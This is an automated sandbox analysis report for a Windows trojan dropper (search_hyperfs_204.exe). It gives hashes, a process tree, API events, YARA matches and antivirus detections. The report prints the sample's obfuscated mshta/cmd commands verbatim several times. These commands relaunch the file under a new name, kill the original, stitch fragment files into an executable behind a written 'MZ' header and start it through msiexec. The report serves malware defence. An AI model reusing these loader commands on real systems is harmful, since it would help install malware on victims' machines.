Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 4, 2021, 2:43 p.m.	Nov. 4, 2021, 3:14 p.m.

Size	1.9MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`04571dd226f182ab814881b6eaaf8b00`
SHA256	`3a77893efb476ec95d3e340cf5b98f1bf39c77a4064be7c39475ef9ebd3aed1c`
CRC32	`ADB77D42`
ssdeep	`49152:NtUl/WNQ393CBC4w8MlQdl29Mz6HAIk+AGhaylhPV:3FNQ3Bwwyo51AGhast`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

search_hyperfs_204.exe "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"
2328
- mshta.exe "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
  2484
  - cmd.exe "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" ) do taskkill -im "%~NxK" -F
    2564
    - 8pWB.eXE 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
      2628
      - mshta.exe "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        2740
        
        cmd.exe "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        2848
      - mshta.exe "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
        3020
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
        2160
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        2288
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
        2368
        
        msiexec.exe msiexec.exe -y .\N3V4H8H.SXY
        2592
    - taskkill.exe taskkill -im "search_hyperfs_204.exe" -F
      2712

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
121.254.136.27	Active	Moloch
192.229.232.200	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 4, 2021, 2:43 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (16 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: -im "search_hyperfs_204.exe" -F console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: SUCCESS: The process "search_hyperfs_204.exe" with PID 2328 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: The file cannot be copied onto itself. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:43 p.m.	buffer: 0 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: 1AQCPNL9.1 console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: HxU0.m console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: Hr0Nm.yl console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: _AeCh.7 console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: Thbtz22Y.U console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: 1MRAv8.M console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: QZ5uW.aQ console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: kKAyeq.00 console_handle: 0x00000007	1	1
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 4, 2021, 2:43 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

Allocates read-write-execute memory (usually to unpack itself) (7 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ca1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 region_size: 921600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2ccc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 region_size: 921600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2cdb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 region_size: 700416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2cea0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 region_size: 708608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2cf50000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2592 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates a suspicious process (12 events)

cmdline	MSHta VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	MSHta VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
cmdline	"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" ) do taskkill -im "%~NxK" -F
cmdline	"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO \| seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
cmdline	"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	msHtA VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO \| seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" EcHO "
cmdline	"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
cmdline	"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	"C:\Windows\system32\cmd.exe" /c EcHO \| seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
cmdline	C:\Windows\System32\cmd.exe /c EcHO \| seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\N3V4H8H.sXy

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "search_hyperfs_204.exe")

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Nov. 4, 2021, 2:43 p.m.	show_type: 0 filepath_r: CMd parameters: /r CopY /y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" ) do taskkill -im "%~NxK" -F filepath: CMd	1	1
ShellExecuteExW Nov. 4, 2021, 2:43 p.m.	show_type: 0 filepath_r: CMd parameters: /r CopY /y "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F filepath: CMd	1	1
ShellExecuteExW Nov. 4, 2021, 2:44 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c EcHO \| seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY filepath: C:\Windows\System32\cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 4, 2021, 2:43 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (49 events)

description	Create a windows service	rule	Create_Service
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Nov. 4, 2021, 2:43 p.m.	status_code: 0x00000001 process_identifier: 2328 process_handle: 0x0000018c		0	0
NtTerminateProcess Nov. 4, 2021, 2:43 p.m.	status_code: 0x00000001 process_identifier: 2328 process_handle: 0x0000018c	1	0	0

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	MSHta VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	MSHta VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	CMd /r CopY /y "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
cmdline	"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" ) do taskkill -im "%~NxK" -F
cmdline	"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
cmdline	taskkill -im "search_hyperfs_204.exe" -F
cmdline	CMd /r CopY /y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe" ) do taskkill -im "%~NxK" -F
cmdline	"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\test22\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
cmdline	"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_204.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )

Communicates with host for which no DNS query was performed (2 events)

host	121.254.136.27
host	192.229.232.200

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2564 resumed a thread in remote process 2628
Process injection	Process 2628 resumed a thread in remote process 3020
Process injection	Process 2160 resumed a thread in remote process 2592
NtResumeThread Nov. 4, 2021, 2:43 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2628	1	0	0
NtResumeThread Nov. 4, 2021, 2:44 p.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 3020	1	0	0
NtResumeThread Nov. 4, 2021, 2:44 p.m.	thread_handle: 0x00000090 suspend_count: 0 process_identifier: 2592	1	0	0

File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 events)

Lionic	Trojan.Win32.Blocker.tqAl
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.47185295
FireEye	Generic.mg.04571dd226f182ab
CAT-QuickHeal	Trojan.Cryprar
ALYac	Trojan.GenericKD.47185295
Cylance	Unsafe
Sangfor	Trojan.Win32.Cryprar.cn
K7AntiVirus	Trojan ( 0057be3e1 )
Alibaba	Trojan:Win32/Cryprar.bd735df3
K7GW	Trojan ( 0057be3e1 )
CrowdStrike	win/malicious_confidence_100% (W)
Symantec	Trojan.Gen.MBT
ESET-NOD32	RAR/Agent.DJ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan.Win32.Cryprar.cn
BitDefender	Trojan.GenericKD.47185295
Avast	FileRepMalware
Ad-Aware	Trojan.GenericKD.47185295
Sophos	Mal/Generic-R + Troj/DwnLd-QX
TrendMicro	TROJ_GEN.R06BC0WJH21
McAfee-GW-Edition	BehavesLike.Win32.Generic.tc
Emsisoft	Trojan.GenericKD.47185295 (B)
SentinelOne	Static AI - Suspicious PE
Webroot	W32.Trojan.Gen
Avira	TR/Agent.lpqsu
MAX	malware (ai score=86)
Kingsoft	Win32.Troj.Cryprar.cn.(kcloud)
Gridinsoft	Trojan.Win32.Agent.vb
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	Trojan.Win32.Cryprar.cn
GData	Trojan.GenericKD.47185295
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Sabsik.C4723532
McAfee	Artemis!04571DD226F1
VBA32	Trojan.Cryprar
Malwarebytes	Trojan.Dropper
Zoner	Probably Heur.RARAutorun
TrendMicro-HouseCall	TROJ_GEN.R06BC0WJH21
Rising	Malware.AbnormalScript/SFX!1.D9B9 (CLASSIC)
Yandex	Trojan.Cryprar!1H0ZtLfSHyU
Ikarus	Trojan.Agent
Fortinet	W32/RARAgent.DL!tr
AVG	FileRepMalware
Cybereason	malicious.fd052a
Panda	Trj/CI.A
MaxSecure	Trojan.Malware.124038691.susgen

search_hyperfs_204.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All